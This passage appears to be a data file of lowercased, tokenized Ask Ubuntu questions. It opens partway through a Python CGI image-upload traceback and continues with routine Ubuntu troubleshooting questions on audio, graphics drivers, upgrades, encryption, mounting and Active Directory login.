< tt > & nbsp ; & nbsp ; < small > & nbsp ; & nbsp ; & nbsp ; 11 < /small > & nbsp ; filename & nbsp ; = & nbsp ; data.getvalue ( `` filename '' ) < br > < /tt > < /font > < /td > < /tr > < tr > < td bgcolor= '' # ffccee '' > < tt > = & gt ; < small > & nbsp ; & nbsp ; & nbsp ; 12 < /small > & nbsp ; im & nbsp ; = & nbsp ; image.open ( `` ../js/upload/ '' & nbsp ; + & nbsp ; filename ) < br > < /tt > < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; & nbsp ; & nbsp ; 13 < /small > & nbsp ; < br > < /tt > < /font > < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; & nbsp ; & nbsp ; 14 < /small > & nbsp ; ( width , & nbsp ; height ) & nbsp ; = & nbsp ; im.size < br > < /tt > < /font > < /td > < /tr > < tr > < td > < small > < font color= '' # 909090 '' > im < em > undefined < /em > , < strong > image < /strong > & nbsp ; = & lt ; module 'image ' from '/usr/lib/python2.7/dist-packages/pilcompat/image.pyc ' & gt ; , image. < strong > open < /strong > & nbsp ; = & lt ; function open & gt ; , < strong > filename < /strong > & nbsp ; = ' < font color= '' # c040c0 '' > \xff\xd8\xff\xe0\x00\x10 < /font > jfif < font color= '' # c040c0 '' > \x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00 < /font > c < font color= '' # c040c0 '' > \x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\n\x10\n\n\t\t\n\x14\x0e < /font > ... < font color= '' # c040c0 '' > \x94\r\x17\x11 < /font > b < font color= '' # c040c0 '' > \xcd\xdc\x1a\xfe\xf1\x05\x1b\x15\xd1 < /font > r < font color= '' # c040c0 '' > \xce\xe9 < /font > * < font color= '' # c040c0 '' > \xb5\x8e < /font > b < font color= '' # c040c0 '' > \x97\x82\x87 < /font > r < font color= '' # c040c0 '' > \xf4\xaa < /font > k < font color= '' # c040c0 '' > \x83 < /font > 6 < font color= '' # c040c0 '' > \xbf\xfb < /font > 0 < font color= '' # c040c0 '' > \xa0\xb6 < /font > 8 < font color= '' # c040c0 '' > \xa9 < /font > c < font color= '' # c040c0 '' > \x86\x8d\x96 < /font > n+e < font color= '' # c040c0 '' > \xd3\x7f\x99\xff\xd9 < /font > ' < /font > < /small > < /td > < /tr > < /table > < table width= '' 100 % '' cellspacing=0 cellpadding=0 border=0 > < tr > < td bgcolor= '' # d8bbff '' > < big > & nbsp ; < /big > < a href= '' file : ///usr/lib/python2.7/dist-packages/pil/image.py '' > /usr/lib/python2.7/dist-packages/pil/image.py < /a > in < strong > open < /strong > ( fp='../js/upload/ < font color= '' # c040c0 '' > \xff\xd8\xff\xe0\x00\x10 < /font > jfif < font color= '' # c040c0 '' > \x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00 < /font > c < font color= '' # c040c0 '' > \x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06 < /font > ... < font color= '' # c040c0 '' > \x94\r\x17\x11 < /font > b < font color= '' # c040c0 '' > \xcd\xdc\x1a\xfe\xf1\x05\x1b\x15\xd1 < /font > r < font color= '' # c040c0 '' > \xce\xe9 < /font > * < font color= '' # c040c0 '' > \xb5\x8e < /font > b < font color= '' # c040c0 '' > \x97\x82\x87 < /font > r < font color= '' # c040c0 '' > \xf4\xaa < /font > k < font color= '' # c040c0 '' > \x83 < /font > 6 < font color= '' # c040c0 '' > \xbf\xfb < /font > 0 < font color= '' # c040c0 '' > \xa0\xb6 < /font > 8 < font color= '' # c040c0 '' > \xa9 < /font > c < font color= '' # c040c0 '' > \x86\x8d\x96 < /font > n+e < font color= '' # c040c0 '' > \xd3\x7f\x99\xff\xd9 < /font > ' , mode='r ' ) < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; 1994 < /small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; if & nbsp ; ispath ( fp ) : < br > < /tt > < /font > < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; 1995 < /small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; filename & nbsp ; = & nbsp ; fp < br > < /tt > < /font > < /td > < /tr > < tr > < td bgcolor= '' # ffccee '' > < tt > = & gt ; < small > & nbsp ; 1996 < /small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; fp & nbsp ; = & nbsp ; builtins.open ( fp , & nbsp ; '' rb '' ) < br > < /tt > < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; 1997 < /small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; else : < br > < /tt > < /font > < /td > < /tr > < tr > < td > < font color= '' # 909090 '' > < tt > & nbsp ; & nbsp ; < small > & nbsp ; 1998 < /small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; filename & nbsp ; = & nbsp ; '' '' < br > < /tt > < /font > < /td > < /tr > < tr > < td > < small > < font color= '' # 909090 '' > < strong > fp < /strong > & nbsp ; = '../js/upload/ < font color= '' # c040c0 '' > \xff\xd8\xff\xe0\x00\x10 < /font > jfif < font color= '' # c040c0 '' > \x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00 < /font > c < font color= '' # c040c0 '' > \x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06 < /font > ... < font color= '' # c040c0 '' > \x94\r\x17\x11 < /font > b < font color= '' # c040c0 '' > \xcd\xdc\x1a\xfe\xf1\x05\x1b\x15\xd1 < /font > r < font color= '' # c040c0 '' > \xce\xe9 < /font > * < font color= '' # c040c0 '' > \xb5\x8e < /font > b < font color= '' # c040c0 '' > \x97\x82\x87 < /font > r < font color= '' # c040c0 '' > \xf4\xaa < /font > k < font color= '' # c040c0 '' > \x83 < /font > 6 < font color= '' # c040c0 '' > \xbf\xfb < /font > 0 < font color= '' # c040c0 '' > \xa0\xb6 < /font > 8 < font color= '' # c040c0 '' > \xa9 < /font > c < font color= '' # c040c0 '' > \x86\x8d\x96 < /font > n+e < font color= '' # c040c0 '' > \xd3\x7f\x99\xff\xd9 < /font > ' , < em > global < /em > < strong > builtins < /strong > & nbsp ; = & lt ; module '__builtin__ ' ( built-in ) & gt ; , builtins. < strong > open < /strong > & nbsp ; = & lt ; built-in function open & gt ; < /font > < /small > < /td > < /tr > < /table > < p > < strong > & lt ; type 'exceptions.typeerror ' & gt ; < /strong > : file ( ) argument 1 must be encoded string without null bytes , not str < br > < tt > < small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; < /small > & nbsp ; < /tt > args & nbsp ; = ( 'file ( ) argument 1 must be encoded string without null bytes , not str ' , ) < br > < tt > < small > & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; < /small > & nbsp ; < /tt > message & nbsp ; = 'file ( ) argument 1 must be encoded string without null bytes , not str' < ! -- the above is a description of an error in a python program , formatted for a web browser because the 'cgitb ' module was enabled . in case you are not reading this in a web browser , here is the original traceback : traceback ( most recent call last ) : file `` /var/www/html/main/cgi-bin/resize.py '' , line 12 , in & lt ; module & gt ; im = image.open ( `` ../js/upload/ '' + filename ) file `` /usr/lib/python2.7/dist-packages/pil/image.py '' , line 1996 , in open fp = builtins.open ( fp , `` rb '' ) typeerror : file ( ) argument 1 must be encoded string without null bytes , not str -- > does this mean that the formdata i am sending over is empty ?
515574	how to change location of time machine on ubuntu server ?	hello i have ubuntu server 14 installed and i bought a new hard drive how do i go about changing the location of where the time machine back up saves ?
515576	how to tell what kind of ram is used ?	i recently added another ram module and while it is supported by my motherboard i 'm not quite sure if it 's of the same type as the one my notebook shipped with . how can i tell what ram modules are used in my pc ?
515581	ecryptfs - decrypt and mount at boot with usb key	i have a system running ubuntu server as a testbed for some services that i want to get familiar with . i decided to let the installation procedure set up encryption . i knew all along that i would have to decrypt it with the passphrase in order to get the system booted , but i assumed it would n't matter since it will only boot once or twice a month . however , my brother has informed me that he is a victim of power outages at the residence where this server is located . this means we have to explain to his girlfriend how to turn on the computer , attach a keyboard , connect a monitor ( she just ca n't understand that she can type to the computer without a display , so whatever ) and input the passphrase for us , while we are at work . i have arrived at the conclusion that i should just put together a usb key that can be plugged in before powering on the computer , to avoid all the trouble . is this possible with ecryptfs ? is there a tutorial or simple list of instructions available so that i can knock this out and focus back on the stuff i care about ? edit : i am aware that this is possible with luks and dm-crypt , but unfortunately the magical encryption that ubuntu hands you during the installation is only ecryptfs so my question is specific to that .
515582	cd tray wo n't open after accidentally stopping brasero cd burn	my laptop is an hp pavilion g6 , running xubuntu 14.04 . i was burning a cd , but accidentally pressed the spacebar . brasero immediately stopped burning , now i ca n't open the cd tray anymore . i 've tried ejecting using the hardware button , in nautilus , and using the terminal eject command â nothing worked . what should i do ? output of sudo eject /dev/sr0 : eject : kon niet uitwerpen , laatste fout : ongepaste ioctl ( ) voor apparaat output of sudo file /dev/sr0 : /dev/sr0 : block special output of sudo eject -i off : eject : kon apparaat niet openen of vinden voor : `cdrom' ( the language is dutch by the way , would you have to translate . )
515583	no audio working	pulseaudio uses up a lot of processing when i open up a video on youtube or play something on rhythmbox . the youtube video never loads , and the music on rhythmbox starts skipping like a minute every second . i tried sudo killall pulseaudio then running pulseaudio logged in as root . i get the below error messages after a little bit : root @ aa-ul : ~ $ pulseaudio w : [ pulseaudio ] main.c : this program is not intended to be run as root ( unless -- system is specified ) . w : [ pulseaudio ] alsa-mixer.c : your kernel driver is broken : it reports a volume range from 0 to 0 which makes no sense . w : [ pulseaudio ] alsa-mixer.c : your kernel driver is broken : it reports a volume range from 0 to 0 which makes no sense . here 's a link to the output of pulseaudio -v that i killed when it took a while . output of aplay -l : aa @ aa-ul : ~ $ aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 0 : alc269 analog [ alc269 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 how can i get audio to work ? i tried apt-get install -- reinstall pulseaudio but it did n't work . i 'm running ubuntu 14.04 64-bit over 3.13.0-34-generic , and the system is up-to-date . here 's the output of an alsa information script that contains the output of some useful commands : http : //www.alsa-project.org/db/ ? f=d43a5b6bca9e599edad228c9c34f3f46987214be
515586	ca n't install quake 3	after installing it from ubuntu software center and having the original disk etc i get the following error message and i have no idea whatsoever of what i am supposed to do : use game-data-packager to build and install the quake3-data package . you will need these two files : -- -- -- -- -- -- -- - baseq3/pak0.pk3 from a quake iii arena cd-rom or installation size : 479493658 bytes md5sum : 1197ca3df1e65f3c380f8abc10ca43bf sha1sum : 9d588ea65e92944d3e23eeb6ec08f1dd666f4658 sha256sum : 7ce8b3910620cd50a09e4f1100f426e8c6180f68895d589f80e6bd95af54bcae -- -- -- -- -- -- -- - linuxq3apoint-1.32b-3.x86.run from any mirror of ftp.idsoftware.com , gentoo or freebsd : for instance try http : //www.filewatcher.com/m/linuxq3apoint-1.32b-3.x86.run.30923961.0.0.html size : 30923961 bytes md5sum : c71fdddccb20e8fc393d846e9c61d685 sha1sum : 802d84af0d515db50a496c4c55d1f1c4f40a9239 sha256sum : c36132c5556b35e01950f1e9c646235033a5130f87ad776ba2bc7becf4f4f186
515588	how to write makefile to package a .so dynamic library that will install all required links	i need help in writing a makefile that installs my library on linux fhs . https : //www.debian.org/doc/debian-policy/ch-sharedlibs.html # s-sharedlibs-dev says that there should be a link from .so to .so. $ ( version ) . $ ( minor ) and a link from .so. $ ( version ) to .so to .so. $ ( version ) . $ ( minor ) . below is snippet from my makefile install -d $ { cnd_artifact_path_ $ { conf } } $ ( destdir ) /usr/lib/ $ { cnd_artifact_name_ $ { conf } } . $ ( version ) .0.0 ln -s $ ( destdir ) /usr/lib/ $ { cnd_artifact_name_ $ { conf } } . $ ( version ) .0.0 $ ( destdir ) /usr/lib/ $ { cnd_artifact_name_ $ { conf } } ln -s $ ( destdir ) /usr/lib/ $ { cnd_artifact_name_ $ { conf } } . $ ( version ) .0.0 $ ( destdir ) /usr/lib/ $ { cnd_artifact_name_ $ { conf } } . $ ( version ) after packaging with dpkg-buildpackage -rfakeroot -b and installing the package the soft links created are pointing to actual .so used to build the package but not to the .so that was installed in /usr/lib/ gowtham @ vbubu : ~ $ ls -la /usr/lib/libbase.so.1* lrwxrwxrwx 1 root root 67 aug 25 00:35 /usr/lib/libbase.so.1 - > /home/gowtham/packages/base-1.0/debian/tmp/usr/lib/libbase.so.1.0.0 -rw-r -- r -- 1 root root 170588 aug 25 00:35 /usr/lib/libbase.so.1.0.0
515589	how do i install pygame in a pyenv virtualenv for python 2.7 on ubuntu 12.04 ?	i found instructions for python 3.3 but nothing specifically for 2.7 . i sorted it out and figured i 'd record it here for future reference .
515591	14.04 lts login window is hidden until mouse pointer is moved to the right	i 've upgraded from dual-booting ubuntu 12.04 lts / windows 7 to dual-booting ubuntu 14.04 lts / windows 7 . before the upgrade , when booting ubuntu , the login window would appear as expected , waiting for my password . but after upgrading , the login window appears for less than 1 sec ( on a solid purple background with a grid of dots ) before getting `` covered over '' by a multicolored wallpaper that says `` 14.04 lts '' in the lower left corner . from this point i can get to the desktop either by entering my password `` blindly '' ( with invisible login window ) , or i can make the login window visible again by moving the mouse a few inches to the right . ( the mouse pointer behaves as though it 's initially off the left edge of the screen . ) q : what can i do to prevent the login window from getting hidden in the first place ? update : in case this might be relevant ... dir /etc/lightdm -- > lightdm.conf lightdm.conf~ lightdm-gtk-greeter.conf lightdm-gtk-greeter-ubuntu.conf users.conf and cat /etc/lightdm/lightdm.conf -- > [ seatdefaults ] greeter-session = unity-greeter user-session = ubuntu allow-guest = false per the answer by xieerqi , replacing greeter-session = unity-greeter with greeter-session = lightdm-gtk-greeter is a viable workaround , but does not solve the issue with unity-greeter . since one of the links in that answer refers to lightdm-unity-greeter ( i.e. , with the prefix lightdm- ) , i also tried the line greeter-session = lightdm-unity-greeter , without success .
515592	unable to launch startxfce4 x session -- - `` startxfce4 '' not found	recently i have tried to upgraded ubuntu 12.04 to 14.04 and it got crashed . somehow i upgraded it to 14.04 and now i can able to see login screen . my problem is when i tried to login i am getting error say unable to launch startxfce4 x session -- - `` startxfce4 '' not found . i can able to login through command line but not in gui . i have tried sudo apt-get install xubuntu-desktop but did n't help . can anyone help me to solve this please . thanks in advance
515596	i ca n't get into the sudoers listings	i try to type a command , to get pinta ( because gimp is n't here for some odd reason ) ( command is sudo add-apt-repository ppa : pinta-maintainers/pinta-stable/ubuntu ) , and it says asbell is not in the sudoers file . this incident will be reported . any idea how to fix this ?
515599	inkscape file recovery	i was working on inkscape software and saved my file as .png , after that my laptop suddenly stopped working . i restarted the system ( hoping there will be a recovery file as inkscape .svg ) but there was n't . is there any possibility i can get my file via that .png extension or is there any other solution or backup ? i need my file layers back .
515600	auto mount usb drive with permissions for all users	i have an ubuntu 14.04 based media center and i store the media files on a usb hdd . i add files to drive directly on a mac so i have it formatted as fat32 . the problem is that after reconnecting the drive to the ubuntu , it mounts at /media/user/drivename and only the root user is allowed access . i need several applications to have full access to this drive . i can change file permissions in the terminal but it does n't change because of the /media/user location . i am able to manually sudo mount /dev/sdc1 /media/drivename & sudo chmod 777 /media/drivename but the mount point changes each time . is there a way to make this drive always mount where root and other applications have access ?
515602	problem with apt-get and ubuntu repository	the install button is not available in the repository , instead i have a button for `` use this source '' . if i try to install any package using apt-get , i get e : unable to locate package . i tried sudo apt-get update , however i get the following : e : some index files failed to download . they have been ignored , or old ones used instead . i ca n't find the problem ! i would appreciate any help !
515604	marvell topdog ( tm ) pci-express 802.11n wireless ( ec85 )	i was running windows vista , but hard drive got wipe out and could n't reinstall it , so i install ubuntu . my problem is that i can not get wireless internet . i have search and search , but nothing help or it was too old and the forms got removed . i 'm new at linux . my computer is gateway m-6752 , running a ( i believe ) marvell topdog ( tm ) pci-express 802.11n wireless ( ec85 ) , driver . how do i get my wireless working ? after i run the command ndiswrapper -m wifi-drivers-for-ubuntu , i get this output repeatedly : '' module configuration already contains alias directive '' i posted a picture of it on my bio of this site : bio picture . i do n't know if you can resize it to see it , but i ca n't post pictures of screen-shots on here .
515610	wish missing but tk is installed	i was wanting to tinker around with tcl/tk programming . i tried to invoke the wish shell , but got this error : $ wish the program 'wish ' is currently not installed . you can install it by typing : sudo apt-get install tk so , i tried to apt-get install tk : $ sudo apt-get install tk reading package lists ... done building dependency tree reading state information ... done tk is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but it 's already installed ... where did wish go ? update : i installed some python-tk packages and now i have wish , but i do n't know which package provided it . however , here is the information requested by the two posters : update alternatives output : $ update-alternatives -- list wish update-alternatives : error : no alternatives for wish lsb release info : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty and now , due to the python-tk packages , when i run the which command i get : $ which -a wish /usr/bin/wish lastly , here 's where it gets interesting , i asked dpkg who is providing /bin/wish : $ dpkg -s /usr/bin/wish tk : /usr/bin/wish i can only imagine than something was corrected during the install of the python-tk packages ... otherwise , i 'm stumped ... but at least it 's working now ...
515613	system went to sleep while running do-release-upgrade	i am trying to upgrade from ubuntu 12.04 to 14.04 on a laptop . i have run sudo do-release-upgrade during the upgrade process the laptop went into sleep/locked screen mode . i have rebooted and noticed that dependencies are broken . running : lsb_release -a shows that the version has been upgraded to 14.04 . however , the upgrade process did not finish ( there was no output , i had to restart the workstation as the screen was blinking continuously ) . now , following this question i have run sudo apt-get -u dist-upgrade and am now waiting for the process to finish .
515617	upgrade from 12.04 to 14.04 ; no desktop , no panels appearing	i am able to log in to gnome ( classic ) and i can use a terminal command there . however , whenever i try to log in to ubuntu , my terminal command does n't work . my guest session does not work either . i was able to get rid of the system program problem detected alert . my mouse works . once i log in , all i see on the bottom left is the ubuntu 14.04 lts sign . also , after running dconf reset -f /org/complex setsid unity i get the following : info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . what can i do to get my launchpad and panels back ?
515620	no operating system	i was upgrading my laptop ( hp pavilion dv6000 ) from ubuntu 12.04 to 14.04 and the power failed . now i have no operating system stops at `` checking battery state [ ok ] i 'm sending this message from my desktop . would it be possible to download 14.04 to my desktop ( without installing it ) , copying the download to a cd-rom , and booting up the laptop from the cd-rom ?
515622	joining an ubuntu 14.04 machine to active directory with realm and sssd	i 've tried following this guide to set up realmd and sssd with active directory : http : //funwithlinux.net/2014/04/join-ubuntu-14-04-to-active-directory-domain-using-realmd/ when i run the command realm –verbose join domain.company.com –user-principal=c-u14-dev1/nwalke @ domain.company.com –unattended everything seems to connect . my sssd.conf looks like the following : [ nss ] filter_groups = root filter_users = root reconnection_retries = 3 [ pam ] reconnection_retries = 3 [ sssd ] domains = domain.company.com config_file_version = 2 services = nss , pam [ domain/domain.company.com ] ad_domain = domain.company.com krb5_realm = domain.company.com realmd_tags = manages-system joined-with-adcli cache_credentials = true id_provider = ad krb5_store_password_if_offline = true default_shell = /bin/bash ldap_id_mapping = true use_fully_qualified_names = false fallback_homedir = /home/ % d/ % u access_provider = ad my /etc/pam.d/common-auth looks like this : auth [ success=3 default=ignore ] pam_krb5.so minimum_uid=1000 auth [ success=2 default=ignore ] pam_unix.so nullok_secure try_first_pass auth [ success=1 default=ignore ] pam_sss.so use_first_pass # here 's the fallback if no module succeeds auth requisite pam_deny.so # prime the stack with a positive return value if there is n't one already ; # this avoids us returning an error just because nothing sets a success code # since the modules above will each just jump around auth required pam_permit.so # and here are more per-package modules ( the `` additional '' block ) auth optional pam_cap.so i 'm able to log in with nwalke/domain.company.com , how do i change these configs so that i can log in with just nwalke ?
515625	my game ( minecraft ) does n't launch ?	when i launch minecraft in ubuntu , no window is showing up but the game is working . i do n't have any error .
515626	repair a nas corrupt partition	i have an iomega 1 tb nas drive . i was downloading something but it shut down because of a problem with the electricity supply . then , the partition was corrupted . the partition format is ntfs so my questions are : is there any way to analyze and try to repair a partition from a nas ? is it possible to use commands such as photorec or testdisk ? what should be the appropriated steps in order to recover my files ?
515627	how to access the uefi firmware settings ? ( aka bios )	when trying to install ubuntu on a uefi-capable computer that came with windows 8 preinstalled there is no indication like on previous computers ( eg . `` press f2 to enter setup '' ) when to access the bios to change the boot order or boot from external media . it just displays the manufacturer logo when pushing the power button and the next that comes on screen is windows . so it seems to boot directly to windows . i 'm not even seeing the windows 8 boot splash â like below â just the manufacturer 's logo .
515631	how to connect/disconnect to wifi via terminal	i just have a quick question that i have been researching for a while now ... how do you connect/disconnect to a wifi network in ubuntu via terminal ? i tried several commands that failed . i have been troubleshooting this for about 55 minutes now , and the question still continues to baffle me . fyi , i am using wlan0 thanks ubuntu : ) p.s . if i can provide any additional info , do n't hesitate to ask .
515634	configuring arrow keys on media	i just installed ubuntu and i 'm extremely happy about it , i can see myself switching to linux from windows permanently . there 's a slight problem however , when i 'm watching a movie , arrow keys skip forward by 1 minute . is it possible to configure this ? if so , how ?
515635	grub installation failed for single os	i am a beginner @ linux . i know there are some threads that touch this but i feel i have done something uniquely stupid . hence the post and plea for help . also this thread has nothing to do with dual boot . i had a single os and am going to a single os . so i have/had a pc with a hdd ( hard disk drive ) and ssd ( solid state drive ) it was running linux mint /dev/sda1 - hdd partition 1 - 2 tb ( mounted this is /home /dev/sda2 - hdd partition 2 - 1 tb ( separate back up drive , i was backing up files to this ) /dev/sdb1 - ssd partition 1 - 100 gb ( os ) /dev/sdb2 - ssd partition 2 - 20 gb ( swap ) the operating system was linux mint and was installed on the /dev/sdb1 i.e the solid state drive . i had partitioned off the sda into 2 tb and 1tb and presented the 2 tb as the /home to the os . anyway last night i decided to make a return to ubuntu via the path of elementary os . everything went fine with the install until it stated that grub installed failed and this was a fatal error ( no kidding i said ) . no i am stuck . i have definitely done something wrong and do n't know what it is ... my biggest pain is the files on the /dev/sda2 . i want to save these before i try something drastic like wiping off the /dev/sda completely . so i have the following questions ... can i use a livecd usb to save these files ? i can see the /dev/sda2 but was unable to access the files in the livecd last not least ... how do i fix the main issue here . why could the os not install grub 2b ... why is my ssd the /dev/sdb ... and not /dev/sda . does that have something to do with it that my master boot record sits on the hdd /dev/sda and not /dev/sdb
515639	installing lmms 1.0.3 on ubuntu	i 'm having problems installing lmms using cmake . i downloaded the tar file , and created the build folder inside of the extracted directory , then run cmake . i 've attached the error log at the bottom . i 'm a beginner when it comes to ubuntu , so i 'd appreciate any help . i 've tried using the software center , but it has an older version of lmms . thanks ! compiling the cxx compiler identification source file `` cmakecxxcompilerid.cpp '' failed . compiler : /home/joseph/anaconda/bin/clang++ build flags : id flags : the output was : 1 /usr/bin/ld : can not find -lstdc++ clang : error : linker command failed with exit code 1 ( use -v to see invocation ) determining if the cxx compiler works failed with the following output : change dir : /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec633473811/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec633473811.dir/build.make cmakefiles/cmtrycompileexec633473811.dir/build make [ 1 ] : entering directory `/home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/cmakefiles 1 building cxx object cmakefiles/cmtrycompileexec633473811.dir/testcxxcompiler.cxx.o /home/joseph/anaconda/bin/clang++ -o cmakefiles/cmtrycompileexec633473811.dir/testcxxcompiler.cxx.o -c /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/testcxxcompiler.cxx linking cxx executable cmtrycompileexec633473811 /usr/bin/cmake -e cmake_link_script cmakefiles/cmtrycompileexec633473811.dir/link.txt -- verbose=1 /home/joseph/anaconda/bin/clang++ cmakefiles/cmtrycompileexec633473811.dir/testcxxcompiler.cxx.o -o cmtrycompileexec633473811 -rdynamic /usr/bin/ld : can not find -lstdc++ clang : error : linker command failed with exit code 1 ( use -v to see invocation ) make [ 1 ] : *** [ cmtrycompileexec633473811 ] error 1 make [ 1 ] : leaving directory `/home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp' make : *** [ cmtrycompileexec633473811/fast ] error 2 determining if files soundcard.h exist failed with the following output : change dir : /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec4188567017/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec4188567017.dir/build.make cmakefiles/cmtrycompileexec4188567017.dir/build make [ 1 ] : entering directory `/home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec4188567017.dir/checkincludefiles.c.o /usr/bin/cc -o cmakefiles/cmtrycompileexec4188567017.dir/checkincludefiles.c.o -c /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/checkincludefiles.c /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/checkincludefiles.c:2:23 : fatal error : soundcard.h : no such file or directory # include < soundcard.h > ^ compilation terminated . make [ 1 ] : *** [ cmakefiles/cmtrycompileexec4188567017.dir/checkincludefiles.c.o ] error 1 make [ 1 ] : leaving directory `/home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp' make : *** [ cmtrycompileexec4188567017/fast ] error 2 source : /* */ # include < soundcard.h > int main ( ) { return 0 ; } determining if files process.h exist failed with the following output : change dir : /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec3312614237/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec3312614237.dir/build.make cmakefiles/cmtrycompileexec3312614237.dir/build make [ 1 ] : entering directory `/home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec3312614237.dir/checkincludefiles.c.o /usr/bin/cc -o cmakefiles/cmtrycompileexec3312614237.dir/checkincludefiles.c.o -c /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/checkincludefiles.c /home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp/checkincludefiles.c:2:21 : fatal error : process.h : no such file or directory # include < process.h > ^ compilation terminated . make [ 1 ] : *** [ cmakefiles/cmtrycompileexec3312614237.dir/checkincludefiles.c.o ] error 1 make [ 1 ] : leaving directory `/home/joseph/desktop/lmms-1.0.3/build/cmakefiles/cmaketmp' make : *** [ cmtrycompileexec3312614237/fast ] error 2 source : /* */ # include < process.h > int main ( ) { return 0 ; }
515646	ubuntu 14.04 black screen after switch gpu to nvidia at nvidia-prime	i 'm using ubuntu 14.04 , desktop manager is lightdm , kernel is 3.13 , after i installed the nvidia driver ( i tried 331 , 340 , 343 , all have this issue ) from 'addtional driver ' application and reboot , the screen freeze after login . if i switch the gpu from nvidia to intel at 'nvidia x server settings ' before i reboot the pc , it 's ok to login and everything is fine . any one has same issue ? how can i fix this problem ? i tried install compiz-config-settings-manager and enable the unity plugin , but still does n't fix the problem . after install the nvidia driver , if i use intel gpu , everything is fine , but as soon as i switch to nvidia gpu and reboot it shows black screen , if i try logout/login the screen freeze . if i type : lspci | grep -i vga it shows : 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) and /usr/bin/nvidia-detector shows none and lspci | grep -i nv shows : 01:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) and i found out there is no /etx/x11/xorg.conf file exist so i run nvidia-xconfig to create one and select nvidia gpu then reboot , but still no luck , then i run prime-select intel switch to intel gpu and startup , the /etx/x11/xorg.conf missing again $ sudo prime-switch nvidia rmmod : error : module nvidia is not currently loaded i have report this bug on launchpad.net : https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-331/+bug/1362848 if this bug also effects you , please go there and click `` this bug effects me '' on top of the page . thanks
515648	can`t mount my device from live cd	i tried to install manually the graphics drivers for my nvidia graphics card . therefore i removed the nouveau driver like in the tutorials https : //help.ubuntu.com/community/nvidiamanual now i got the problem that i can`t get back to my desktop view . i even cant get to the command line via strg + alt +f1 . i tried to install the driver with the live cd/usb . but when i wanted to mount my ssd with mount /dev/sdb1 /mnt it doesnt work . i went to the mnt folder and listed the items in there and just found a file called efi did i do something wrong or is there something wrong booting my live cd ? i tried it with uefi mode aswell . thanks , alex
515650	computer freezes on password prompt after upgrading to 14.04	first , i should say that i am a total beginner . when answering , please do not take for granted that i understand even the most basic step . yesterday , i was given the option to update to ubuntu 14.04 . i clicked yes , and the system took about 2.5 hours to accomplish this task . now , whenever i log into my user account , i get an error message and then i am asked to authenticate my user account . when i try to enter the password , my computer freezes . what can i do to fix this ?
